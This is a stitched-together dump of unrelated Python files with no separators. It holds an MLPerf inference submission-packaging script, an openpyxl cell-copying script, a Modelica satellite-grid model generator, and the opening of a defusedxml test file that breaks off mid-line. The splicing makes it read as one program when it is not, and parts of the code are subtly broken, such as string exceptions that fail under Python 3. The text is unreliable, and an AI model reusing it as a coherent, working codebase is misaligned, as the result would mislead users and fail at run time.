# repos_image_classification_open = [ # firefly 'mlperf.open.image-classification.firefly.tflite-v1.15', # https://github.com/mlperf/submissions_inference_0_5/pull/39 'mlperf.open.image-classification.firefly.tflite-v1.15.mobilenet-v1-quantized', # https://github.com/mlperf/submissions_inference_0_5/pull/127 'mlperf.open.image-classification.firefly.armnn-v19.08.opencl', # https://github.com/mlperf/submissions_inference_0_5/pull/40 'mlperf.open.image-classification.firefly.armnn-v19.08.neon', # https://github.com/mlperf/submissions_inference_0_5/pull/120 # hikey960 'mlperf.open.image-classification.hikey960.tflite-v1.15', # https://github.com/mlperf/submissions_inference_0_5/pull/37 'mlperf.open.image-classification.hikey960.tflite-v1.15.mobilenet-v1-quantized', # https://github.com/mlperf/submissions_inference_0_5/pull/128 'mlperf.open.image-classification.hikey960.armnn-v19.08.opencl', # https://github.com/mlperf/submissions_inference_0_5/pull/38 'mlperf.open.image-classification.hikey960.armnn-v19.08.neon', # https://github.com/mlperf/submissions_inference_0_5/pull/121 # rpi4 'mlperf.open.image-classification.rpi4.tflite-v1.15', # https://github.com/mlperf/submissions_inference_0_5/pull/122 'mlperf.open.image-classification.rpi4.tflite-v1.15.mobilenet-v1-quantized', # https://github.com/mlperf/submissions_inference_0_5/pull/129 'mlperf.open.image-classification.rpi4.armnn-v19.08.neon', # https://github.com/mlperf/submissions_inference_0_5/pull/123 # mate10pro 'mlperf.open.image-classification.mate10pro.tflite-v1.13.mobilenet', # https://github.com/mlperf/submissions_inference_0_5/pull/130 'mlperf.open.image-classification.mate10pro.tflite-v1.13.mobilenet-v1-quantized', # https://github.com/mlperf/submissions_inference_0_5/pull/135 ] repos_image_classification_open_audit = [ 'mlperf.open.image-classification.firefly.audit', # https://github.com/mlperf/submissions_inference_0_5/pull/255 'mlperf.open.image-classification.hikey960.audit', # 
https://github.com/mlperf/submissions_inference_0_5/pull/257 'mlperf.open.image-classification.rpi4.audit', # https://github.com/mlperf/submissions_inference_0_5/pull/258 #'mlperf.open.image-classification.mate10pro.audit', ] # # Object Detection - Open (TensorFlow Model Zoo + YOLO-v3) # repos_object_detection_open = [ # velociti 'mlperf.open.object-detection.velociti', # https://www.dropbox.com/s/wiea3a8zf077jsv/mlperf.open.object-detection.velociti.zip ] # In[ ]: # repos_for_testing = [ # 'mlperf.closed.image-classification.mate10pro.tflite-v1.13.mobilenet.BAD_LOADGEN', # 'mlperf.closed.image-classification.mate10pro.armnn-v19.08.opencl.BAD_RESNET', # 'mlperf.closed.image-classification.mate10pro.armnn-v19.08.neon.BAD_RESNET', # 'mlperf-inference-vision-experiments-count5' # ] # In[ ]: # #!ck recache repo # for repo_uoa in repos: # print("=" * 100) # print(repo_uoa) # print("=" * 100) # !ck list $repo_uoa:experiment:* | sort # print("-" * 100) # print("") # In[ ]: upstream_path=os.environ.get('CK_ENV_MLPERF_INFERENCE','') # In[ ]: root_dir=os.environ.get('CK_MLPERF_SUBMISSION_ROOT','') def check_experimental_results(repo_uoa, module_uoa='experiment', tags='mlperf', submitter='dividiti', path=None, audit=False): if not os.path.exists(root_dir): os.mkdir(root_dir) print("Storing results under '%s'" % root_dir) r = ck.access({'action':'search', 'repo_uoa':repo_uoa, 'module_uoa':module_uoa, 'tags':tags}) if r['return']>0: print('Error: %s' % r['error']) exit(1) experiments = r['lst'] for experiment in experiments: data_uoa = experiment['data_uoa'] r = ck.access({'action':'list_points', 'repo_uoa':repo_uoa, 'module_uoa':module_uoa, 'data_uoa':data_uoa}) if r['return']>0: print('Error: %s' % r['error']) exit(1) print("*" * 100) tags = r['dict']['tags'] #print(tags) backend = '' preprocessing = '' notes = '' # pprint(tags) if 'velociti' in tags: # Expected format: [ "mlperf", "open", "object-detection", "velociti", "cpu", "rcnn-inception-resnet-v2-lowproposals", 
"singlestream", "accuracy" ] (_, division, task, platform, backend, benchmark, scenario, mode) = tags if task == 'object-detection': library = 'tensorflow-v1.14' else: library = 'tensorrt-v6.0' backend = '' notes = '======= DEMO =======' elif 'accuracy' in tags: # FIXME: With the benefit of hindsight, [ ..., "armnn-v19.08", "neon", ... ] should have come # as one tag "armnn-v19.08-neon", since we join them in this notebook anyway. if 'neon' in tags or 'opencl' in tags: # Expected format: [ "mlperf", "open", "image-classification", "firefly", "armnn-v19.08", "neon", "mobilenet-v1-0.5-128", "singlestream", "accuracy", "using-opencv" ] (_, division, task, platform, library, backend, benchmark, scenario, mode, preprocessing) = tags else: # Expected format: [ "mlperf", "open", "image-classification", "firefly", "tflite-v1.15", "mobilenet-v1-0.5-128", "singlestream", "accuracy", "using-opencv" ] (_, division, task, platform, library, benchmark, scenario, mode, preprocessing) = tags elif 'performance' in tags: if 'neon' in tags or 'opencl' in tags: # Expected format: [ "mlperf", "open", "image-classification", "firefly", "armnn-v19.08", "neon", "mobilenet-v1-0.5-128", "singlestream", "performance" ] (_, division, task, platform, library, backend, benchmark, scenario, mode) = tags else: # Expected format: [ "mlperf", "open", "image-classification", "firefly", "tflite-v1.15", "mobilenet-v1-0.5-128", "singlestream", "performance" ] (_, division, task, platform, library, benchmark, scenario, mode) = tags elif 'audit' in tags: # As accuracy but with the test name instead of the preprocessing method. 
if 'neon' in tags or 'opencl' in tags: # Expected format: [ "mlperf", "open", "image-classification", "firefly", "armnn-v19.08", "neon", "mobilenet-v1-0.5-128", "singlestream", "audit", "TEST03" ] (_, division, task, platform, library, backend, benchmark, scenario, mode, test) = tags else: # Expected format: [ "mlperf", "open", "image-classification", "firefly", "tflite-v1.15", "mobilenet-v1-0.5-128", "singlestream", "audit", "TEST03" ] (_, division, task, platform, library, benchmark, scenario, mode, test) = tags else: raise "Expected 'accuracy' or 'performance' or 'audit' in tags!" # if mode == 'accuracy': continue organization = submitter if backend != '': system = platform+'-'+library+'-'+backend else: system = platform+'-'+library division_system = division+'-'+system if library.startswith('tflite'): implementation = task+'-tflite' elif library.startswith('armnn'): implementation = task+'-armnn-tflite' elif library.startswith('tensorrt'): implementation = task+'-tensorrt-loadgen-py' else: # Official app with CK adaptations. 
implementation = 'mlperf-inference-vision' implementation_benchmark = implementation+'-'+benchmark # # Directory structure according to the Inference section of the General MLPerf Submission Rules: # https://github.com/mlperf/policies/blob/master/submission_rules.adoc#552-inference # # <division>/ # <organization>/ # division_dir = os.path.join(root_dir, division) if not os.path.exists(division_dir): os.mkdir(division_dir) organization_dir = os.path.join(division_dir, organization) if not os.path.exists(organization_dir): os.mkdir(organization_dir) # # "systems"/ # <system_desc_id>.json # systems_dir = os.path.join(organization_dir, 'systems') if not os.path.exists(systems_dir): os.mkdir(systems_dir) system_json_name = '%s.json' % system system_json_path = os.path.join(systems_dir, system_json_name) with open(system_json_path, 'w') as system_json_file: # pprint(division_system) # pprint(division_systems) system_json = division_systems.get(division_system, default_system_json) json.dump(system_json, system_json_file, indent=2) print('%s' % systems_dir) if system_json == default_system_json: print(' |_ %s [DEFAULT]' % system_json_name) raise else: print(' |_ %s [%s]' % (system_json_name, division_system)) # # "code"/ # <benchmark_name_per_reference>/ # <implementation_id>/ # <Code interface with loadgen and other arbitrary stuff> # code_dir = os.path.join(organization_dir, 'code') if not os.path.exists(code_dir): os.mkdir(code_dir) # FIXME: For now, not always "per reference". benchmark_dir = os.path.join(code_dir, benchmark) if not os.path.exists(benchmark_dir): os.mkdir(benchmark_dir) implementation_dir = os.path.join(benchmark_dir, implementation) if not os.path.exists(implementation_dir): os.mkdir(implementation_dir) print('%s' % code_dir) # Create 'README.md'. 
implementation_readme_name = 'README.md' implementation_readme_path = os.path.join(implementation_dir, implementation_readme_name) # pprint(implementation) # pprint(implementation_readmes) implementation_readme = implementation_readmes.get(implementation, '') with open(implementation_readme_path, 'w') as implementation_readme_file: implementation_readme_file.writelines(implementation_readme) if implementation_readme == '': print(' |_ %s [EMPTY]' % implementation_readme_name) raise else: print(' |_ %s' % implementation_readme_name) # # "measurements"/ # <system_desc_id>/ # <benchmark>/ # <scenario>/ # <system_desc_id>_<implementation_id>.json # README.md # user.conf # mlperf.conf # calibration_process.adoc (?) # submission_checklist.txt # measurements_dir = os.path.join(organization_dir, 'measurements') if not os.path.exists(measurements_dir): os.mkdir(measurements_dir) system_dir = os.path.join(measurements_dir, system) if not os.path.exists(system_dir): os.mkdir(system_dir) benchmark_dir = os.path.join(system_dir, benchmark) if not os.path.exists(benchmark_dir): os.mkdir(benchmark_dir) scenario_dir = os.path.join(benchmark_dir, scenario) if not os.path.exists(scenario_dir): os.mkdir(scenario_dir) print(scenario_dir) # Create '<system_desc_id>_<implementation_id>.json'. 
system_implementation_json_name = system+'_'+implementation+'.json' system_implementation_json_path = os.path.join(scenario_dir, system_implementation_json_name) with open(system_implementation_json_path, 'w') as system_implementation_json_file: implementation_benchmark_json = implementation_benchmarks.get(implementation_benchmark, default_implementation_benchmark_json) # pprint(implementation_benchmark) if implementation_benchmark_json != default_implementation_benchmark_json: print(' |_ %s [for %s]' % (system_implementation_json_name, implementation_benchmark)) json.dump(implementation_benchmark_json, system_implementation_json_file, indent=2) else: print(' |_ %s [DEFAULT]' % system_implementation_json_name) raise "Default implementation!" # Create 'README.md' based on the division and task (basically, mentions a division- and task-specific script). measurements_readme_name = 'README.md' measurements_readme_path = os.path.join(scenario_dir, measurements_readme_name) measurements_readme = measurements_readmes.get(division+'-'+task, '') if measurements_readme != '': with open(measurements_readme_path, 'w') as measurements_readme_file: measurements_readme_file.writelines(measurements_readme) print(' |_ %s [for %s %s]' % (measurements_readme_name, division, task)) else: raise "Invalid measurements README!" # Create 'NOTES.txt'. measurements_notes_name = 'NOTES.txt' measurements_notes_path = os.path.join(scenario_dir, measurements_notes_name) measurements_notes = notes if measurements_notes != '': with open(measurements_notes_path, 'w') as measurements_notes_file: measurements_notes_file.writelines(measurements_notes) print(' |_ %s [for %s %s]' % (measurements_notes_name, division, task)) # Try to find environment for 'user.conf'. 
loadgen_config_tags='loadgen,config,'+implementation lgc = ck.access({'action':'search', 'module_uoa':'env', 'tags':loadgen_config_tags}) if lgc['return']>0: print('Error: %s' % lgc['error']) exit(1) envs = lgc['lst'] if len(envs) > 1: # Found several environments. print('Error: More than one environment found with tags=\'%s\'' % loadgen_config_tags) exit(1) elif len(envs) == 1: # Found exactly one environment. lgc = ck.access({'action':'load', 'module_uoa':'env', 'data_uoa':envs[0]['data_uoa']}) if lgc['return']>0: print('Error: %s' % lgc['error']) exit(1) # CK_ENV_LOADGEN_CONFIG=/home/anton/CK_REPOS/ck-mlperf/soft/config.loadgen/image-classification-armnn-tflite-loadgen-conf # CK_ENV_LOADGEN_CONFIG_FILE=/home/anton/CK_REPOS/ck-mlperf/soft/config.loadgen/image-classification-armnn-tflite-loadgen-conf/user.conf user_conf_path=lgc['dict']['env']['CK_ENV_LOADGEN_CONFIG_FILE'] user_conf_name=user_conf_path[len(lgc['dict']['env']['CK_ENV_LOADGEN_CONFIG'])+1:] elif len(envs) == 0: # Not found any environments: copy 'user.conf' from implementation source. user_conf_name = 'user.conf' implementation_path = implementation_paths.get(implementation, '') if implementation_path == '': raise "Invalid implementation path!" user_conf_path = os.path.join(implementation_path, user_conf_name) copy2(user_conf_path, scenario_dir) print(' |_ %s [from %s]' % (user_conf_name, user_conf_path)) # Copy 'mlperf.conf' from MLPerf Inference source. 
mlperf_conf_name = 'mlperf.conf' mlperf_conf_path = os.path.join(scenario_dir, mlperf_conf_name) if implementation in [ 'image-classification-tflite', 'image-classification-armnn-tflite' ]: # Write a snapshot from https://github.com/dividiti/inference/blob/61220457dec221ed1984c62bd9d382698bd71bc6/v0.5/mlperf.conf with open(mlperf_conf_path, 'w') as mlperf_conf_file: mlperf_conf_file.writelines(mlperf_conf_6122045) print(' |_ %s [from %s]' % (mlperf_conf_name, 'github.com/mlperf/inference@6122045')) else: upstream_mlperf_conf_path = os.path.join(upstream_path, 'v0.5', 'mlperf.conf') copy2(upstream_mlperf_conf_path, mlperf_conf_path) print(' |_ %s [from %s]' % (mlperf_conf_name, upstream_mlperf_conf_path)) # Write submission_checklist.txt into the same directory later, once accuracy.txt is parsed. # # "results"/ # <system_desc_id>/ # <benchmark>/ # <scenario>/ # performance/ # run_x/ # 1 run for single stream and offline, 5 otherwise # mlperf_log_summary.txt # mlperf_log_detail.txt # mlperf_log_trace.json # accuracy/ # mlperf_log_accuracy.json # compliance_checker_log.txt # results_dir = os.path.join(organization_dir, 'results') if not os.path.exists(results_dir): os.mkdir(results_dir) system_dir = os.path.join(results_dir, system) if not os.path.exists(system_dir): os.mkdir(system_dir) benchmark_dir = os.path.join(system_dir, benchmark) if not os.path.exists(benchmark_dir): os.mkdir(benchmark_dir) scenario_dir = os.path.join(benchmark_dir, scenario) if not os.path.exists(scenario_dir): os.mkdir(scenario_dir) mode_dir = os.path.join(scenario_dir, mode) if not os.path.exists(mode_dir): os.mkdir(mode_dir) print(mode_dir) if audit: # Deal with a subset of audit tests. # if test not in [ 'TEST03' ]: # [ 'TEST01', 'TEST03', 'TEST04-A', 'TEST04-B', 'TEST05' ]: # continue # Save the accuracy and performance dirs for the corresponding submission experiment. 
accuracy_dir = os.path.join(scenario_dir, 'accuracy') performance_dir = os.path.join(scenario_dir, 'performance', 'run_1') # Use the mode expected for each test. mode = 'performance' if test != 'TEST03' else 'submission' # Create a similar directory structure to results_dir, with another level, test_dir, # between scenario_dir and mode_dir. audit_dir = os.path.join(organization_dir, 'audit') if not os.path.exists(audit_dir): os.mkdir(audit_dir) system_dir = os.path.join(audit_dir, system) if not os.path.exists(system_dir): os.mkdir(system_dir) benchmark_dir = os.path.join(system_dir, benchmark) if not os.path.exists(benchmark_dir): os.mkdir(benchmark_dir) scenario_dir = os.path.join(benchmark_dir, scenario) if not os.path.exists(scenario_dir): os.mkdir(scenario_dir) test_dir = os.path.join(scenario_dir, test) if not os.path.exists(test_dir): os.mkdir(test_dir) mode_dir = os.path.join(test_dir, mode) if not os.path.exists(mode_dir): os.mkdir(mode_dir) # For each point (should be one point for each performance run). points = r['points'] for (point, point_idx) in zip(points, range(1,len(points)+1)): point_file_path = os.path.join(r['path'], 'ckp-%s.0001.json' % point) with open(point_file_path) as point_file: point_data_raw = json.load(point_file) characteristics_list = point_data_raw['characteristics_list'] characteristics = characteristics_list[0] # Set the leaf directory. if mode == 'performance': run_dir = os.path.join(mode_dir, 'run_%d' % point_idx) if not os.path.exists(run_dir): os.mkdir(run_dir) last_dir = run_dir # Performance notes. Should ideally go inside the run_x dir, but the checker complains. if 'velociti' in tags and 'tensorrt' in tags: num_streams = point_data_raw['choices']['env'].get('CK_LOADGEN_MULTISTREAMNESS', '') if num_streams == '': num_streams = '?' 
performance_notes = 'uid={}: {} streams'.format(point, num_streams) performance_notes_name = run_dir + '.txt' performance_notes_path = os.path.join(mode_dir, performance_notes_name) with open(performance_notes_path, 'w') as performance_notes_file: performance_notes_file.writelines(performance_notes) print(' |_ %s' % performance_notes_name) else: last_dir = mode_dir print(last_dir) # Dump files in the leaf directory. mlperf_log = characteristics['run'].get('mlperf_log',{}) # Summary file (with errors and warnings in accuracy mode, with statistics in performance mode). summary_txt_name = 'mlperf_log_summary.txt' summary_txt_path = os.path.join(last_dir, summary_txt_name) summary = mlperf_log.get('summary','') with open(summary_txt_path, 'w') as summary_txt_file: summary_txt_file.writelines(summary) print(' |_ %s' % summary_txt_name) # Detail file (with settings). detail_txt_name = 'mlperf_log_detail.txt' detail_txt_path = os.path.join(last_dir, detail_txt_name) detail = mlperf_log.get('detail','') with open(detail_txt_path, 'w') as detail_txt_file: detail_txt_file.writelines(detail) print(' |_ %s' % detail_txt_name) # Accuracy file (with accuracy dictionary). # TODO: Move the next 5 lines into the (if mode == 'accuracy') block, # once the submission checker no longer complains as follows: # "performance/run_1 has file list mismatch (['mlperf_log_accuracy.json'])" accuracy_json_name = 'mlperf_log_accuracy.json' accuracy_json_path = os.path.join(last_dir, accuracy_json_name) with open(accuracy_json_path, 'w') as accuracy_json_file: json.dump(mlperf_log.get('accuracy',{}), accuracy_json_file, indent=2) print(' |_ %s' % accuracy_json_name) # Do what's required by NVIDIA's audit tests. if audit: test_path = os.path.join(upstream_path, 'v0.5', 'audit', 'nvidia', test) if 'TEST01' in tags: # Verify that the accuracy (partially) dumped for the audit test matches that for the submision. 
verify_accuracy_py = os.path.join(test_path, 'verify_accuracy.py') submission_accuracy_json_path = os.path.join(accuracy_dir, accuracy_json_name) verify_accuracy_txt = get_ipython().getoutput('python3 $verify_accuracy_py -a $submission_accuracy_json_path -p $accuracy_json_path') verify_accuracy_txt_name = 'verify_accuracy.txt' verify_accuracy_txt_path = os.path.join(test_dir, verify_accuracy_txt_name) with open(verify_accuracy_txt_path, 'w') as verify_accuracy_txt_file: verify_accuracy_txt_file.writelines('\n'.join(verify_accuracy_txt)) print('%s' % test_dir) print(' |_ %s' % verify_accuracy_txt_name) if test in [ 'TEST01', 'TEST03', 'TEST05' ]: # Verify that the performance for the audit test matches that for the submission. verify_performance_py = os.path.join(test_path, 'verify_performance.py') submission_summary_txt_path = os.path.join(performance_dir, summary_txt_name) verify_performance_txt = get_ipython().getoutput('python3 $verify_performance_py -r $submission_summary_txt_path -t $summary_txt_path') verify_performance_txt_name = 'verify_performance.txt' verify_performance_txt_path = os.path.join(test_dir, verify_performance_txt_name) with open(verify_performance_txt_path, 'w') as verify_performance_txt_file: verify_performance_txt_file.writelines('\n'.join(verify_performance_txt)) print('%s' % test_dir) print(' |_ %s' % verify_performance_txt_name) if test in [ 'TEST04-A', 'TEST04-B' ]: test04a_summary_txt_path = os.path.join(scenario_dir, 'TEST04-A', 'performance', 'run_1', summary_txt_name) test04b_summary_txt_path = os.path.join(scenario_dir, 'TEST04-B', 'performance', 'run_1', summary_txt_name) if os.path.exists(test04a_summary_txt_path) and os.path.exists(test04b_summary_txt_path): # If both tests have been processed, verify that their performance matches. 
verify_performance_py = os.path.join(upstream_path, 'v0.5', 'audit', 'nvidia', 'TEST04-A', 'verify_test4_performance.py') #print("python3 {} -u {} -s {}".format(verify_performance_py, test04a_summary_txt_path, test04b_summary_txt_path)) verify_performance_txt = get_ipython().getoutput('python3 $verify_performance_py -u $test04a_summary_txt_path -s $test04b_summary_txt_path') #print(verify_performance_txt) verify_performance_txt_name = 'verify_performance.txt' verify_performance_txt_path = os.path.join(scenario_dir, 'TEST04-A', verify_performance_txt_name) with open(verify_performance_txt_path, 'w') as verify_performance_txt_file: verify_performance_txt_file.writelines('\n'.join(verify_performance_txt)) print('%s' % os.path.join(scenario_dir, 'TEST04-A')) print(' |_ %s' % verify_performance_txt_name) else: # Need both A/B tests to be processed. Wait for the other one. continue # Generate accuracy.txt. if mode == 'accuracy' or mode == 'submission': accuracy_txt_name = 'accuracy.txt' accuracy_txt_path = os.path.join(last_dir, accuracy_txt_name) if task == 'image-classification': accuracy_imagenet_py = os.path.join(upstream_path, 'v0.5', 'classification_and_detection', 'tools', 'accuracy-imagenet.py') accuracy_txt = get_ipython().getoutput('python3 $accuracy_imagenet_py --imagenet-val-file $imagenet_val_file --mlperf-accuracy-file $accuracy_json_path') # The last (and only line) is e.g. "accuracy=76.442%, good=38221, total=50000". accuracy_line = accuracy_txt[-1] match = re.match('accuracy=(.+)%, good=(\d+), total=(\d+)', accuracy_line) accuracy_pc = float(match.group(1)) elif task == 'object-detection': accuracy_coco_py = os.path.join(upstream_path, 'v0.5', 'classification_and_detection', 'tools', 'accuracy-coco.py') # os.environ['PYTHONPATH'] = pythonpath_coco+':'+os.environ.get('PYTHONPATH','') accuracy_txt = get_ipython().getoutput('python3 $accuracy_coco_py --coco-dir $coco_dir --mlperf-accuracy-file $accuracy_json_path') # The last line is e.g. "mAP=13.323%". 
accuracy_line = accuracy_txt[-1] match = re.match('mAP\=([\d\.]+)\%', accuracy_line) accuracy_pc = float(match.group(1)) else: raise "Invalid task '%s'!" % task with open(accuracy_txt_path, 'w') as accuracy_txt_file: accuracy_txt_file.writelines('\n'.join(accuracy_txt)) print(' |_ %s [%.3f%% parsed from "%s"]' % (accuracy_txt_name, accuracy_pc, accuracy_line)) # Generate submission_checklist.txt for each system, benchmark and scenario under "measurements/". if mode == 'accuracy' and not audit: checklist_name = 'submission_checklist.txt' checklist_path = os.path.join(measurements_dir, system, benchmark, scenario, checklist_name) system_json = division_systems.get(division_system, default_system_json) # Extract LoadGen revision from the second line of e.g. # "pid": 28660, "tid": 28660, "ts": 8750ns : version : .5a1 @ 61220457de # FIXME: In practice, the revision may be different for accuracy and performance runs # (happened on rpi4 due to a late LoadGen fix). We would prefer to use one from # the performance one, as it may be more critical for performance evaluation. # However, as we only write the checklist from the accuracy run, we are somewhat stuck. loadgen_revision = detail[1].split('@')[1].strip() # FIXME: The actual performance_sample_count can be extracted from the performance run. # Again, this is not available to us here. # We could check in user.conf, but we would need to parse it. performance_sample_count = 1024 if task == 'image-classification' else 256 # Write the checklist. if division == 'open' and task == 'object-detection': # Collaboration between dividiti and Politecnico di Milano. 
print(system) checklist = get_checklist(name='Anton Lokhmotov; Emanuele Vitali', email='anton@dividiti.com; emanuele.vitali@polimi.it', division=division, task=task, system=system, system_name=system_json['system_name'], category=system_json['status'], revision=loadgen_revision, benchmark=benchmark, accuracy_pc=accuracy_pc, performance_sample_count=performance_sample_count, numerics=implementation_benchmark_json['weight_data_types']) else: checklist = get_checklist(division=division, task=task, system=system, system_name=system_json['system_name'], category=system_json['status'], revision=loadgen_revision, benchmark=benchmark, accuracy_pc=accuracy_pc, performance_sample_count=performance_sample_count, numerics=implementation_benchmark_json['weight_data_types']) with open(checklist_path, 'w') as checklist_file: checklist_file.writelines(checklist) # # Trace file (should omit trace from v0.5). # trace_json_name = 'mlperf_log_trace.json' # trace_json_path = os.path.join(last_dir, trace_json_name) # with open(trace_json_path, 'w') as trace_json_file: # json.dump(mlperf_log.get('trace',{}), trace_json_file, indent=2) return repo = os.environ.get('CK_MLPERF_SUBMISSION_REPO','') repos = [ repo ] if repo != '' else [] for repo_uoa in repos: check_experimental_results(repo_uoa, audit=False) submitter = os.environ.get('CK_MLPERF_SUBMISSION_SUBMITTER','dividiti') # ### Extract audit repos # In[ ]: # # audit_repos = repos_image_classification_closed_audit + repos_image_classification_open_audit # audit_repos = [ 'mlperf.closed.image-classification.mate10pro.audit' ] # for repo_uoa in audit_repos: # check_experimental_results(repo_uoa, path=path, submitter=submitter, audit=True) # ### Run submission checker # In[ ]: print("*" * 100) submission_checker_py = os.path.join(upstream_path, 'v0.5', 'tools', 'submission', 'submission-checker.py') # The checker has a weird bug. When submitting to open, 'closed/<organization>/results' must exist on disk. 
# Vice versa, when submitting to closed, 'open/<organization>/results' must exist on disk.
# Therefore, create both directories (if they do not exist) before invoking the checker.
open_org_results_dir = os.path.join(root_dir, 'open', submitter, 'results')
closed_org_results_dir = os.path.join(root_dir, 'closed', submitter, 'results')
# os.makedirs() with exist_ok=True is 'mkdir -p' without depending on a POSIX shell.
os.makedirs(open_org_results_dir, exist_ok=True)
os.makedirs(closed_org_results_dir, exist_ok=True)

# Run the checker and echo its captured output.
checker_log = get_ipython().getoutput('python3 $submission_checker_py --input $root_dir --submitter $submitter')
checker_log = "\n".join(checker_log)
print(checker_log)

checker_log_name = 'compliance_checker_log.txt'
# Write the checker results once under closed/<organization> and once under open/<organization>.
for results_dir in [ open_org_results_dir, closed_org_results_dir ]:
    checker_log_path = os.path.join(results_dir, checker_log_name)
    with open(checker_log_path, 'w') as checker_log_file:
        # checker_log is a single string: use write(), not writelines()
        # (writelines() on a str iterates it character by character).
        checker_log_file.write(checker_log)
    print(results_dir)
    print(' |_%s' % checker_log_name)
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Copy every cell of the first worksheet of ``origin_book.xlsx`` into a new
worksheet named ``copy_data`` and save the result as ``aftercopy_book.xlsx``.

Cell values are written as their ``"%s"`` string representation, mirroring the
original behaviour.
"""
from __future__ import absolute_import

from openpyxl import Workbook
from openpyxl import load_workbook

finally_filename = 'aftercopy_book.xlsx'
origin_filename = 'origin_book.xlsx'

read_wb = load_workbook(filename=origin_filename)
# .sheetnames replaces the deprecated .get_sheet_names() accessor.
sheet_names = read_wb.sheetnames
ws1 = read_wb[sheet_names[0]]
ws2 = read_wb.create_sheet(title="copy_data")

for row_idx, row in enumerate(ws1.rows):
    for col_idx, cell in enumerate(row):
        # BUG FIX: the original wrote every cell into column 1, so each row
        # kept only its last column's value.  Preserve the source column.
        ws2.cell(column=col_idx + 1, row=row_idx + 1, value="%s" % (cell.value))

read_wb.save(filename=finally_filename)
#
# Generator for a Modelica model of a size_x x size_y x size_z satellite
# building-block grid with variable-radiation optical properties.
#
# The script fills four string lists (BB, connection_element, env, conncet)
# with Modelica component declarations and connect() equations, then echoes
# every generated line to stdout while writing it to "<modelname>.mo".
#

# Grid dimensions (number of building blocks per axis).
size_x = 3
size_y = 3
size_z = 3

modelname = "generic_satellite_var_rad_optical_properties_"+str(size_x)+"x"+str(size_y)+"x"+str(size_z)
#modelname = "generic_satellite_optical_properties_"+str(size_x)+"x"+str(size_y)+"x"+str(size_z)

import_to_model = ["iboss.*","iboss.illumination.*"]
parameter = ["illumination.LEO.Strahlungsleistung_3x3x3_LEO_EnMap_SunPointing orbit_illumination"]

BB = []                  # building-block component declarations
connection_element = []  # thermal interface (TIM) component declarations
conncet = []             # connect() equations (misspelled name kept for compatibility)
env = []                 # environment component declarations

# Panel orientations of a block and the matching suffix used by the
# illumination model (xn <-> nX, xp <-> pX, ...).
orientation = ["xn","xp","yn","yp","zn","zp"]
orientation_env = ["nX","pX","nY","pY","nZ","pZ"]

# Path (including embedded double quotes) of the alpha/epsilon lookup table.
filename = '"E:\\\Eigene Dateien\\\iBOSS-2\\\Gesamtsimulation_TuE\\\ibosssim\\\model\\\iboss\\\thermochrom_alpha_epsilon.txt"'
#filename = '"/home/jens/iBOSS2/Simulation_Linux/ibosssim/model/iboss/thermochrom_alpha_epsilon.txt"'

for i in range(1, size_x + 1):
    for j in range(1, size_y + 1):
        for k in range(1, size_z + 1):
            bb_id = str(i) + str(j) + str(k)

            # One building block with a combiTable1Ds lookup on every panel.
            panels = ", ".join(
                "Panel_" + p + "(combiTable1Ds1(fileName = " + str(filename) + "))"
                for p in ("xp", "xn", "yp", "yn", "zn", "zp"))
            BB.append(" iboss_thermal.buildingblocks.BuildingBlock_optical_properties_var_rad BB" + bb_id + "(" + panels + ");")
            #BB.append(" iboss_thermal.buildingblocks.BuildingBlock_optical_properties BB" + bb_id + ";")

            # Environment component plus two connections for each of the six panels.
            for ori, ori_env in zip(orientation, orientation_env):
                env.append(" iboss_thermal.components.environment_optical_properties BB" + bb_id + ori_env + "(illumination=orbit_illumination.BB" + bb_id + ori_env + ");")
                conncet.append(" connect(BB" + bb_id + ori_env + ".thermal_connector_env,BB" + bb_id + ".thermal_connector_" + ori + ");")
                conncet.append(" connect(BB" + bb_id + ori_env + ".panel_surface1,BB" + bb_id + ".panel_surface_" + ori + ");")

            # Thermal interface (TIM) towards the previous neighbour on each
            # axis; the first block along an axis has no predecessor.
            for has_prev, prev_id, axis in (
                    (i > 1, str(i - 1) + str(j) + str(k), "x"),
                    (j > 1, str(i) + str(j - 1) + str(k), "y"),
                    (k > 1, str(i) + str(j) + str(k - 1), "z")):
                if not has_prev:
                    continue
                tim = "TIM_BB" + prev_id + "_BB" + bb_id
                connection_element.append(" iboss_thermal.components.thermal_TIM_optical_properties " + tim + ";")
                conncet.append(" connect(BB" + prev_id + ".thermal_connector_" + axis + "p," + tim + ".thermal_connector2);")
                conncet.append(" connect(BB" + prev_id + ".panel_surface_" + axis + "p," + tim + ".panel_surface2);")
                conncet.append(" connect(BB" + bb_id + ".thermal_connector_" + axis + "n," + tim + ".thermal_connector1);")
                conncet.append(" connect(BB" + bb_id + ".panel_surface_" + axis + "n," + tim + ".panel_surface1);")

# Emit the model: echo every generated line and write it to "<modelname>.mo".
with open(modelname + ".mo", "w") as modelica_obj:

    def emit(line):
        """Print one generated line and append it (plus a newline) to the file."""
        print(line)
        modelica_obj.write(line + "\n")

    emit("model " + modelname)
    for entry in import_to_model:
        emit(" import " + entry + ";")
    for entry in parameter:
        emit(" parameter " + entry + ";")
    for line in BB:
        emit(line)
    for line in connection_element:
        emit(line)
    for line in env:
        emit(line)
    emit(" equation")
    for line in conncet:
        emit(line)
    emit("end " + modelname + ";")
from __future__ import print_function import os import sys import unittest import io import re from xml.sax.saxutils import XMLGenerator from xml.sax import SAXParseException from pyexpat import ExpatError from defusedxml import cElementTree, ElementTree, minidom, pulldom, sax, xmlrpc from defusedxml import defuse_stdlib from defusedxml import (DefusedXmlException, DTDForbidden, EntitiesForbidden, ExternalReferenceForbidden, NotSupportedError) from defusedxml.common import PY3, PY26, PY31 try: import gzip except ImportError: gzip = None try: from defusedxml import lxml from lxml.etree import XMLSyntaxError LXML3 = lxml.LXML3 except ImportError: lxml = None XMLSyntaxError = None LXML3 = False HERE = os.path.dirname(os.path.abspath(__file__)) # prevent web access # based on Debian's rules, Port 9 is discard os.environ["http_proxy"] = "http://127.0.9.1:9" os.environ["https_proxy"] = os.environ["http_proxy"] os.environ["ftp_proxy"] = os.environ["http_proxy"] if PY26 or PY31: class _AssertRaisesContext(object): def __init__(self, expected, test_case, expected_regexp=None): self.expected = expected self.failureException = test_case.failureException self.expected_regexp = expected_regexp def __enter__(self): return self def __exit__(self, exc_type, exc_value, tb): if exc_type is None: try: exc_name = self.expected.__name__ except AttributeError: exc_name = str(self.expected) raise self.failureException( "{0} not raised".format(exc_name)) if not issubclass(exc_type, self.expected): # let unexpected exceptions pass through return False self.exception = exc_value # store for later retrieval if self.expected_regexp is None: return True expected_regexp = self.expected_regexp if isinstance(expected_regexp, basestring): expected_regexp = re.compile(expected_regexp) if not expected_regexp.search(str(exc_value)): raise self.failureException('"%s" does not match 